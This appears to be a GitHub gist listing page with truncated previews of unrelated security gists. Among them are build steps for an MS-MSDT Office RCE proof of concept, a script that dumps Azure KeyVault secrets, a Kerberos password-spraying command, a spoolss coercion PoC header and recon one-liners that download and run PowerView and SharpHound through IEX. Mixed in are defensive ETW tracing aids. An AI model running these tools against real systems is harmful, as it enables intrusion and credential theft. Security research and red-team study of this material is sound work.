tothi
/ ms-msdt.MD
Last active
June 16, 2025 21:37
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
- Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
iann0036
/ gist:b473bbb3097c5f4c656ed3d07b4d2222
Last active
November 14, 2025 12:59
List of expensive / long-term effect AWS IAM actions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| acm-pca:CreateCertificateAuthority | |
| aws-marketplace:AcceptAgreementApprovalRequest | |
| aws-marketplace:Subscribe | |
| backup:PutBackupVaultLockConfiguration | |
| bedrock:CreateProvisionedModelThroughput | |
| bedrock:UpdateProvisionedModelThroughput | |
| devicefarm:PurchaseOffering | |
| dynamodb:PurchaseReservedCapacityOfferings | |
| ec2:ModifyReservedInstances | |
| ec2:PurchaseCapacityBlock |
Flangvik
/ DumpKeyVaultDevOps.ps1
Last active
July 21, 2023 13:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec! | |
| #reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline | |
| #Suppress warnings for clean output | |
| Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true" | |
| #Get all Azure KeyVaults from currently selected/scoped subscription | |
| #This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity | |
| $vaults = Get-AzKeyVault |
RedTeams
/ Windows command line gui access.md
Created
May 28, 2020 10:21
— forked from scotgabriel/Windows command line gui access.md
Common windows functions via rundll user32 and control panel
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
mattifestation
/ NiftyETWProviders.json
Created
December 21, 2018 19:27
ETW providers you never knew existed...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "ProviderGUID": "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a", | |
| "ProviderName": "AccEventTool", | |
| "ProviderGroupGUID": "4f50731a-89cf-4782-b3e0-dce8c90476ba", | |
| "AssociatedFilenames": [ | |
| "accevent.exe", | |
| "inspect.exe", | |
| "narrator.exe", | |
| "srh.dll" |
3xocyte
/ dementor.py
Last active
February 11, 2026 23:57
rough PoC to connect to spoolss to elicit machine account authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
countercept
/ dotnet-runtime-etw.py
Last active
August 22, 2023 16:02
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import etw | |
| import etw.evntrace | |
| import sys | |
| import argparse | |
| import threading | |
| class RundownDotNetETW(etw.ETW): | |
| def __init__(self, verbose, high_risk_only): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
NewerOlder